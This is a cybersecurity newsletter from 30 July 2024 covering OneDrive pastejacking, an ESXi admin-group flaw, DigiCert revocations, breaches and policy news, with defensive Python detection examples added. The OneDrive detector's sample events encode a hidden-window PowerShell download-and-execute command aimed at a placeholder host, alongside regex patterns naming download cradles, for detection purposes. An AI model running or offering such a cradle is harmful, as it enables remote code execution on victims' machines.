Cyber Briefing - 2024.07.30


What's the latest in the cyber world today?

Microsoft OneDrive, PowerShell Script, Apple, iOS, macOS, tvOS, visionOS, VMware, ESXi Hypervisor, Proofpoint, Email Routing, Phishing, DigiCert, SSL/TLS Certificates, Domain Verification, Zeus Group, Israeli Athletes, Olympics Paris 2024, Northeast Rehabilitation Hospital Network, Patient Data, Avanpost, Pro-Ukrainian Hackers, RA World, Melchers, UAB School of Nursing, European Central Bank, Stress Test, US, TikTok Ban, National Security, UK, Information Commissioner's Office, Electoral Commission, Reserve Bank of India (RBI), ZeroTier, Inc., Funding, Virtual Networking



Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.

First time seeing this? Please subscribe.



Cyber Alerts


1. OneDrive Phishing Scam Deploys Malware

A sophisticated phishing campaign targeting Microsoft OneDrive users has been discovered, leveraging social engineering to execute a malicious PowerShell script. Dubbed "OneDrive Pastejacking," the attack involves sending an email with an HTML file that simulates a OneDrive error page. Users are deceived into opening a PowerShell terminal and running a Base64-encoded command, leading to the download and execution of a malicious script.
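The pastejacking chain above leaves a recognisable trace in process-creation telemetry: a PowerShell process launched from a user's shell (rather than a task scheduler or management agent) with a hidden window and an -EncodedCommand payload that, once decoded, fetches and runs remote code. The following detection logic is an added example written for this briefing, not code from the newsletter or from the researchers who reported the campaign; the event records, field names and the placeholder host `example.invalid` are constructed, and the indicator set is a heuristic to tune against your own baseline.

```python
import base64
import re

def _b64_utf16(script: str) -> str:
    """PowerShell's -EncodedCommand expects Base64 of the UTF-16LE script text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed process-creation records (not real telemetry): parent image,
# process image and full command line, as an EDR or Sysmon Event 1 would log.
SAMPLE_EVENTS = [
    # scheduled task running an on-disk script: benign
    {"parent": "svchost.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -File C:\\scripts\\nightly-backup.ps1"},
    # a user typing a one-liner in a console: interactive but harmless
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe Get-Date"},
    # pastejacking pattern: interactive parent, hidden window, encoded payload
    # that downloads and runs a remote script (placeholder host, constructed)
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ec " + _b64_utf16(
         "iex (iwr 'http://example.invalid/stage.ps1' -UseBasicParsing)")},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common ones.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)
DOWNLOAD_CRADLE = re.compile(
    r"(?:invoke-webrequest|\biwr\b|downloadstring|downloadfile|invoke-expression|\biex\b|net\.webclient)",
    re.IGNORECASE)
# Parents that mean a human launched the shell (a pasted command), not an agent or task.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand script, or None if absent or malformed."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def score_event(event: dict) -> list:
    """Name the indicators present in one process-creation record."""
    indicators = []
    decoded = decode_encoded_command(event["cmdline"])
    if decoded is not None:
        indicators.append("encoded_command")
    # look for a download-and-execute pattern in the decoded (or visible) command line
    if DOWNLOAD_CRADLE.search(decoded or event["cmdline"]):
        indicators.append("download_cradle")
    if HIDDEN_WINDOW.search(event["cmdline"]):
        indicators.append("hidden_window")
    if event["parent"].lower() in INTERACTIVE_PARENTS:
        indicators.append("interactive_parent")
    return indicators

def flag_events(events, min_indicators: int = 2) -> list:
    """Return (event, indicators) pairs that reach the alert threshold."""
    flagged = []
    for event in events:
        indicators = score_event(event)
        if len(indicators) >= min_indicators:
            flagged.append((event, indicators))
    return flagged

if __name__ == "__main__":
    for event, indicators in flag_events(SAMPLE_EVENTS):
        print(event["parent"], "->", event["image"], indicators)
        print("  decoded:", decode_encoded_command(event["cmdline"]))
```

Decoding the payload before pattern matching is the point: a rule that only inspects the visible command line never sees the download cradle, because the Base64 hides it. An interactive parent on its own is not an alert (analysts run PowerShell all day), which is why the threshold requires a second indicator.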


2. Apple Rolls Out Major Security Updates

Apple has issued critical security updates for a range of its operating systems, including iOS, macOS, tvOS, visionOS, watchOS, and Safari, addressing numerous vulnerabilities. The updates, released on July 30, 2024, include iOS 17.6 and iPadOS 17.6, which patch 35 security flaws that could lead to authentication bypasses, unexpected application terminations, system shutdowns, information disclosure, denial-of-service attacks, and memory leaks.


3. VMware ESXi Flaw Grants Full Admin Access

Microsoft researchers have uncovered a severe vulnerability in VMware ESXi hypervisors which grants full administrative access to unauthorized users. This flaw allows members of a specially named domain group, “ESX Admins,” to gain unrestricted admin privileges on ESXi hypervisors without proper validation. Exploited by ransomware groups such as Storm-0506 and Octo Tempest, the vulnerability enables attackers to encrypt the hypervisor’s file system, disrupting all hosted virtual machines and potentially leading to data exfiltration and lateral network movement.
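Because the hypervisor trusts the group purely by name, the defender's earliest signal is in Active Directory: someone creating a security group called "ESX Admins" or adding members to one. The following detection over Windows Security log events is an added example written for this briefing, not code from Microsoft or VMware; the records are constructed, and matching with case folding and collapsed whitespace is a deliberately broad choice to catch near-variants of the name.

```python
import re

# Constructed Windows Security log records (not real data). Field names follow the
# Security log schema: EventID, TargetUserName (the group), SubjectUserName (the actor),
# MemberName (the account added, for member-add events).
SAMPLE_EVENTS = [
    {"EventID": 4727, "TargetUserName": "Finance-Readers",
     "SubjectUserName": "jdoe", "Computer": "DC01"},
    {"EventID": 4727, "TargetUserName": "esx  admins",
     "SubjectUserName": "contractor7", "Computer": "DC01"},
    {"EventID": 4728, "TargetUserName": "ESX Admins",
     "MemberName": "CN=contractor7,OU=Staff,DC=corp,DC=example",
     "SubjectUserName": "contractor7", "Computer": "DC01"},
    {"EventID": 4728, "TargetUserName": "Domain Users",
     "MemberName": "CN=newhire,OU=Staff,DC=corp,DC=example",
     "SubjectUserName": "hr-automation", "Computer": "DC01"},
]

# Security-enabled group lifecycle events: global / domain-local / universal.
GROUP_CREATED = {4727, 4731, 4754}
MEMBER_ADDED = {4728, 4732, 4756}
# Group names that confer privilege on a system that never validated them.
SENSITIVE_GROUPS = {"esx admins"}

def normalize(name: str) -> str:
    """Case-fold and collapse whitespace so 'ESX  Admins' and 'esx admins' compare equal."""
    return re.sub(r"\s+", " ", name).strip().casefold()

def classify(event: dict):
    """Return a rule name if the event touches a sensitive group, else None."""
    if normalize(event.get("TargetUserName", "")) not in SENSITIVE_GROUPS:
        return None
    if event["EventID"] in GROUP_CREATED:
        return "esx-admins-group-created"
    if event["EventID"] in MEMBER_ADDED:
        return "esx-admins-member-added"
    return None

def find_alerts(events) -> list:
    """Return (rule, event) pairs in log order."""
    alerts = []
    for event in events:
        rule = classify(event)
        if rule:
            alerts.append((rule, event))
    return alerts

if __name__ == "__main__":
    for rule, event in find_alerts(SAMPLE_EVENTS):
        who = event["SubjectUserName"]
        target = event.get("MemberName", event["TargetUserName"])
        print(f"{rule}: {who} on {event['Computer']} -> {target}")
```

A group creation by an account that is not a domain administrator deserves the highest priority, since the flaw means any user with group-creation rights can mint hypervisor admins; a rename of an existing group to this name is a second path worth covering with the group-changed events once you have confirmed the field layout in your own logs.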


4. Proofpoint Email Flaw Enables Phishing Scams

An extensive phishing campaign has exploited a significant email routing flaw in Proofpoint's security infrastructure, affecting millions of users. The campaign, dubbed "EchoSpoofing" by Guardio Labs, involved threat actors sending spoofed emails from well-known companies such as Best Buy, IBM, Nike, and Walt Disney. The flaw in Proofpoint's servers allowed these emails to bypass traditional security measures, including SPF and DKIM authentication, making them appear legitimate.


5. DigiCert to Revoke SSL/TLS Certificates

DigiCert, a prominent certificate authority, has announced the revocation of thousands of SSL/TLS certificates due to a critical Domain Control Verification error. The issue, stemming from a failure to include an underscore prefix in DNS-based CNAME records, affects approximately 0.4% of domain validations. This oversight violates the CA/Browser Forum's strict verification rules, necessitating the immediate revocation of non-compliant certificates.
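The underscore in a DNS-change validation label is not cosmetic: standard hostnames cannot contain an underscore, so a label such as `_k7f3q9` can never collide with a real host, whereas `k7f3q9.example` could be an ordinary machine someone else already controls. The audit below is an added example written for this briefing, not DigiCert's own tooling; the zone excerpt, the random values and the validation target `dcv.ca-example.invalid` are constructed placeholders, and the parser handles only the simple CNAME and A lines shown.

```python
import re

# Constructed zone-file excerpt (not real DNS data): three customer domains that were
# each asked to publish a CNAME from a random-value label to the CA's validation host.
CA_TARGET = "dcv.ca-example.invalid"        # placeholder, an assumption
RANDOM_VALUES = {                            # random value issued per domain (constructed)
    "alpha.example": "k7f3q9",
    "beta.example": "m2p8xz",
    "gamma.example": "r4n1ty",
}

ZONE_TEXT = """\
; alpha published the compliant, underscore-prefixed label
_k7f3q9.alpha.example.   300 IN CNAME dcv.ca-example.invalid.
; beta published the legacy form without the underscore
m2p8xz.beta.example.     300 IN CNAME dcv.ca-example.invalid.
; gamma published nothing relevant to validation
www.gamma.example.       300 IN A     192.0.2.10
"""

# owner  [ttl]  [IN]  type  rdata   (enough for the record types in the excerpt)
RR_LINE = re.compile(r"^(\S+)\s+(?:\d+\s+)?(?:IN\s+)?(CNAME|A)\s+(\S+)", re.IGNORECASE)

def parse_zone(text: str) -> dict:
    """Map lowercase owner name -> list of (TYPE, rdata) from simple zone-file lines."""
    records = {}
    for line in text.splitlines():
        line = line.split(";", 1)[0].strip()     # drop comments and blank lines
        if not line:
            continue
        m = RR_LINE.match(line)
        if not m:
            continue
        name, rtype, rdata = m.groups()
        records.setdefault(name.rstrip(".").lower(), []).append(
            (rtype.upper(), rdata.rstrip(".").lower()))
    return records

# RFC 1123 hostname label: letters, digits and interior hyphens only.
HOSTNAME_LABEL = re.compile(r"^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$")

def could_be_hostname(label: str) -> bool:
    """True if the label is a legal hostname, i.e. could name a real machine."""
    return HOSTNAME_LABEL.match(label.lower()) is not None

def audit_dns_change(domain: str, random_value: str, records: dict,
                     target: str = CA_TARGET) -> str:
    """Classify one domain's validation record as compliant, legacy or missing."""
    compliant = f"_{random_value}.{domain}".lower()
    legacy = f"{random_value}.{domain}".lower()
    if ("CNAME", target) in records.get(compliant, []):
        return "compliant"
    if ("CNAME", target) in records.get(legacy, []):
        return "legacy-no-underscore"   # proves control, but violates the BR rule
    return "missing"

def audit_all(values: dict, records: dict) -> dict:
    return {d: audit_dns_change(d, v, records) for d, v in values.items()}

if __name__ == "__main__":
    for domain, status in audit_all(RANDOM_VALUES, parse_zone(ZONE_TEXT)).items():
        print(f"{domain}: {status}")
```

Running the audit separates the three cases a CA (or a customer checking its own exposure) cares about: certificates validated through a compliant record can stand, the legacy form needs revalidation before the certificate is reissued, and a missing record means the domain was never validated this way at all.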



Cyber Incidents


6. Zeus Group Leaks Data of Israeli Athletes

On July 29, 2024, the hacker group known as "Zeus" leaked sensitive data of Israeli athletes participating in the Paris Olympics, including blood test results and login credentials. The breach, revealed on Telegram, led France's Anti-Cybercrime Office (OFAC) to urgently seek the removal of the compromised information. Zeus, also reported to have disclosed the military status of Israeli athletes, has heightened security concerns amid the ongoing Gaza conflict.


7. NRHN Suffers Major Data Breach

Northeast Rehabilitation Hospital Network (NRHN) has reported a data privacy incident affecting certain current or former patients. Unauthorized access to NRHN’s network occurred between May 13 and May 22, 2024, potentially compromising files containing personal and medical information. While there is no evidence of identity theft or fraud, NRHN is actively investigating and has informed federal law enforcement. The network is enhancing its security measures and reviewing policies to prevent future incidents.


8. Pro-Ukrainian Hackers Target Russian Firm

A pro-Ukrainian hacker group known as Cyber Anarchy Squad has claimed responsibility for a significant cyberattack on Russian information security firm Avanpost. The group reported encrypting over 400 virtual machines and physical workstations, destroying more than 60 terabytes of data, and leaking 390 gigabytes of sensitive information. Avanpost, which has been operating for 15 years and provides security systems for various Russian enterprises, confirmed the breach, describing it as a serious cyberattack.


9. Melchers Hit by RA World Ransomware Attack

The Bremen-based retail group Melchers has fallen victim to a ransomware attack carried out by the group RA World. The cybercriminals have claimed to have stolen 15 gigabytes of sensitive data, including financial records and business documents, from Melchers' Singapore branch. While RA World has boasted about the breach on the darknet, Melchers has denied any data leakage. The company has confirmed the attack and is currently working with external experts to restore its systems using backups and investigate the incident further.


10. UAB Postcard Incident Exposes Patient Data

The University of Alabama at Birmingham (UAB) School of Nursing has notified 1,655 patients in Birmingham, Alabama, of a privacy breach involving a study recruitment postcard. The postcard, intended for a breast cancer diagnosis survey, inadvertently displayed patients' names, addresses, and inferred diagnoses. UAB acknowledged the error and has apologized, detailing steps taken to prevent future incidents.



Cyber News


11. ECB Wraps Up Banking Cyber Stress Test

The European Central Bank (ECB) has concluded its inaugural cyber stress test for the European banking sector, revealing that while banks have robust response and recovery frameworks, there is notable room for improvement. The test, conducted in January and involving 109 banks, assessed the sector's resilience against cyber disruptions. Although banks demonstrated high-level preparedness, weaknesses in recovery capabilities, particularly in worst-case scenarios, were identified.


12. Justice Dept. Fights TikTok Lawsuit Over Ban

The U.S. Justice Department is vigorously defending the constitutionality of a new law that could either force TikTok to divest its U.S. assets or result in a ban on the app starting January 2025. In response to TikTok's lawsuit challenging the law, which TikTok argues infringes on free speech, the Justice Department asserts that the legislation is necessary to address national security concerns. The department contends that TikTok's ownership by Chinese company ByteDance poses risks of sensitive data exposure and potential manipulation of information consumed by American users.


13. ICO Blames Electoral Commission for Breach

The Information Commissioner’s Office (ICO) has sharply criticized the UK Electoral Commission for significant security shortcomings that allowed hackers to access personal details of 40 million British voters. The ICO's investigation into the August 2021 data breach revealed that the Commission failed to implement essential security measures, such as updating its Microsoft Exchange Server and enforcing robust password management policies. The breach, which went undetected until October 2022, was attributed to exploitation of known vulnerabilities and poor security practices.


14. India’s Average Data Breach Cost Hits $2.18M

According to the Reserve Bank of India’s 2024 cybersecurity report, the average cost of a data breach in India surged to $2.18 million in 2023, marking a 28% increase since 2020. The report highlights that phishing and stolen credentials are now the leading attack vectors, with phishing accounting for 22% of incidents. The number of security incidents in India skyrocketed from 53,117 in 2017 to 1.32 million in 2023. The automotive sector emerged as the most vulnerable industry, while the BFSI sector, due to stringent regulations, reported comparatively better protection.


15. ZeroTier Raises $13.5M in Series A Funding

ZeroTier, a leading provider of virtual networking solutions, has raised $13.5 million in Series A funding led by Battery Ventures, with participation from several other investors including 7percent Ventures and Airbridge Equity Partners. Founded in 2011 and based in Irvine, CA, ZeroTier offers a secure and scalable network solution optimized for IoT deployments, connecting over three million devices across 230 countries. The company plans to use the new funds to drive innovation, enhance product development, and expand its market presence.



Subscribe and Comment.

Copyright © 2024 CyberMaterial. All Rights Reserved.

Follow CyberMaterial on:

LinkedIn, Twitter, Reddit, Instagram, Facebook, YouTube, and Medium.




Saad Janjua

Cyber Security | Digital Forensics | Networking | Ethical Hacking | Python Programming

3 months

awesome news.
